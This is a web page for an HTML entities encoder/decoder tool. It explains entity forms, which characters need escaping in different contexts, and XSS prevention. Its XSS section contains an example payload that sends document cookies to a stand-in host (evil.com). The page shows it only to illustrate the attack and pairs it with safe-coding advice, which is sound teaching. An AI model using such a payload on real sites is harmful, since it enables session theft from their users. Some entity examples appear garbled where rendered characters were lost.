Code & Dev
Free HTML Entities Encoder & Decoder
Encode special characters as HTML entities or decode HTML entities back to text.
What are HTML entities and why do they exist?
HTML entities are special sequences of characters used to represent characters that either have special meaning in HTML or cannot be reliably typed in all environments. Every entity starts with an ampersand (&) and ends with a semicolon (;).
HTML parsers use certain characters to define markup: < opens a tag, > closes one, and & begins an entity reference itself. If you want to display the literal text 2 < 5 in a browser, you cannot write the raw less-than sign — the parser would try to open a tag. Entities solve this by providing a safe, unambiguous representation.
Beyond required characters, entities also allow you to include characters that may be difficult to type on a keyboard or that might be stripped or corrupted by text editors and transmission protocols. The copyright symbol ©, the em dash —, and non-breaking spaces are common examples of characters that are best represented as entities.
Required entities vs optional ones
Not all HTML encoding is mandatory. Understanding which characters must be encoded and which are optional helps you avoid unnecessary verbosity while maintaining correctness.
&→ & (always)<→ < (in content)>→ > (in content)"→ " (in double-quoted attrs)'→ ' (in single-quoted attrs)
- © → © (readable alternative)
- — → — (semantic clarity)
- Non-breaking space →
- € → € (safe across encodings)
- Any Unicode above U+007F in ASCII files
If your HTML file is saved as UTF-8 (the universal standard since HTML5), you can include any Unicode character directly without encoding. The main reason to encode non-ASCII characters is legacy compatibility — older systems, email clients, and some templating engines may mangle Unicode. For modern web applications using UTF-8 consistently, only the five required characters need encoding.
Named vs numeric (decimal) vs numeric (hex) entities
HTML supports three forms for every character entity, and all three produce identical output in the browser:
&name;&lt; → <Uses a human-readable name defined in the HTML specification. Limited to characters that have been assigned names — not every Unicode character has one.
&#number;&#60; → <Uses the decimal Unicode code point. Works for any Unicode character (code points 0–1,114,111). No memorization needed — look up the code point and use it.
&#xHex;&#x3C; → <Uses the hexadecimal Unicode code point with an x prefix. Preferred by developers familiar with Unicode since Unicode documentation uses hex (U+003C = 0x3C).
XSS prevention — why HTML encoding is a security critical practice
Cross-Site Scripting (XSS) is consistently one of the OWASP Top 10 most critical web security vulnerabilities. It occurs when an attacker injects malicious client-side scripts into a web page that other users view. The attack works because the browser cannot distinguish between intentional JavaScript and injected code — it executes both.
The classic attack scenario: a comment field allows user input. An attacker submits <script>fetch('evil.com?c='+document.cookie)</script>. If the application renders this raw HTML, every user who views the comment page has their session cookie exfiltrated.
// DANGEROUS: renders user input as HTML
document.getElementById('comment').innerHTML = userInput;// SAFE: encodes special characters before rendering
const el = document.createElement('div');
el.appendChild(document.createTextNode(userInput));
container.appendChild(el);Modern frameworks like React, Vue, and Angular HTML-encode content by default. React's JSX uses dangerouslySetInnerHTML as an explicit opt-in to raw HTML rendering — the name is intentional. If you bypass framework defaults to render raw HTML, you must encode user input manually.
Complete reference of the most important HTML entities
| Character | Named Entity | Decimal | Hex | Category |
|---|---|---|---|---|
| & | &amp; | &#38; | &#x26; | Required |
| < | &lt; | &#60; | &#x3C; | Required |
| > | &gt; | &#62; | &#x3E; | Required |
| " | &quot; | &#34; | &#x22; | Required in attrs |
| ' | &apos; | &#39; | &#x27; | Required in attrs |
| &nbsp; | &#160; | &#xA0; | Whitespace | |
| © | &copy; | &#169; | &#xA9; | Legal |
| ® | &reg; | &#174; | &#xAE; | Legal |
| ™ | &trade; | &#8482; | &#x2122; | Legal |
| — | &mdash; | &#8212; | &#x2014; | Typography |
| – | &ndash; | &#8211; | &#x2013; | Typography |
| … | &hellip; | &#8230; | &#x2026; | Typography |
| € | &euro; | &#8364; | &#x20AC; | Currency |
| £ | &pound; | &#163; | &#xA3; | Currency |
Encoding in different contexts
Encode &, <, and > at minimum. These three prevent tag injection and entity-sequence injection.
<p><script> is not a real tag here</p>Encode & and " in addition to < and >. A literal double quote would close the attribute.
<input value="5 > 3 && x < 10">Encode & and ' (or '). Single-quoted attributes need the apostrophe escaped instead of the double quote.
<input value='O'Brien'>Never embed raw user data in JavaScript script blocks using only HTML encoding. JavaScript strings in HTML need both JavaScript string escaping and HTML encoding. Prefer data attributes or JSON instead.
<!-- UNSAFE: -->
<script>var name = "<?= htmlspecialchars($name) ?>";</script>HTML encoding is separate from URL encoding. Use encodeURIComponent() for URL parameters — & in a URL is the HTML entity for the separator character, not the URL-encoded value.
<a href="?q=hello%20world&lang=en">Search</a>Character encoding — UTF-8, ASCII, and how entities relate
ASCII (American Standard Code for Information Interchange) defines 128 characters using 7 bits: the basic Latin alphabet, digits, punctuation, and control characters. HTML was originally designed to work within ASCII, which is why characters outside ASCII needed entity references — the underlying encoding might not support them.
UTF-8 is a variable-length encoding that covers all 1,114,112 Unicode code points. It uses 1 byte for ASCII characters (backward compatible) and up to 4 bytes for emoji and rare scripts. HTML5 mandates UTF-8 as the document encoding and modern servers declare it via Content-Type: text/html; charset=utf-8.
With UTF-8 declared, you can include any Unicode character — emoji, Chinese characters, mathematical symbols — directly in your HTML without entities. The only characters that still require entities are the five that have special HTML meaning (&, <, >, ", '). HTML entities for other characters (©, €, —) are now purely a readability preference, not a necessity.
FAQ
Common questions
What are HTML entities?
HTML entities are sequences of characters used to represent special characters in HTML markup. They begin with an ampersand (&) and end with a semicolon (;). For example, < represents the less-than sign <. Entities are necessary when you need to display characters that HTML would otherwise interpret as markup — like < and >.
Which HTML characters must be escaped?
Three characters are required to be escaped in HTML content: & (ampersand → &), < (less-than → <), and > (greater-than → >). Inside HTML attribute values, you also need to escape the quote character being used: " (→ ") for double-quoted attributes. The apostrophe ' (→ ') must be escaped in single-quoted attributes. Forgetting to escape these is the root cause of most HTML injection vulnerabilities.
What is the difference between named and numeric HTML entities?
Named entities use a descriptive name: & for &, < for <, © for ©. Numeric entities use either decimal (& for &) or hexadecimal (& for &) Unicode code points. Named entities are more readable; numeric entities work for any Unicode character, including those without a named entity. All three forms produce identical output.
Why do I need to encode HTML entities?
Encoding prevents HTML injection and XSS (Cross-Site Scripting) attacks. If a user inputs <script>alert(1)</script> and your application renders it without encoding, the browser executes the script. By encoding < as < and > as >, the browser displays the literal characters instead of interpreting them as tags. This is one of the most critical security practices in web development.
What is ?
(non-breaking space) is a whitespace character that prevents line breaks. Unlike a regular space, text separated by will not wrap onto a new line. It is also not collapsed by HTML's whitespace normalization. Use between values that should stay together: "10 km", "Dr. Smith", "Fig. 1".
What is the difference between < and <?
< is a named entity for the less-than sign <. < is the decimal numeric entity for the same character (Unicode code point 60). < is the hexadecimal equivalent. All three produce exactly the same character in the browser. Named entities are preferred for readability, but numeric entities are universal for any Unicode code point.
Do I need to encode special characters in HTML attributes?
Yes. Inside attribute values, you must encode the quote delimiter. In double-quoted attributes, encode " as ". In single-quoted attributes, encode ' as ' or '. You should also always encode & as & inside attribute values, especially in URLs (href, src, action). Failure to do so can break attribute parsing or enable injection attacks.
What is XSS and how does HTML encoding prevent it?
XSS (Cross-Site Scripting) is an attack where malicious scripts are injected into web pages viewed by other users. The most common vector is rendering user input as raw HTML. HTML encoding converts dangerous characters (<, >, &, ", ') into their entity equivalents, so the browser displays them as text instead of parsing them as HTML. Always encode any data from external sources before rendering it in HTML.
More in Code & Dev